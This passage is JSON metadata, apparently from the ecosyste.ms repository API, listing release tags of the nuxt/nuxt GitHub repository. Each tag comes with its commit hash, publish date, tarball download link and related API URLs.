pi/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories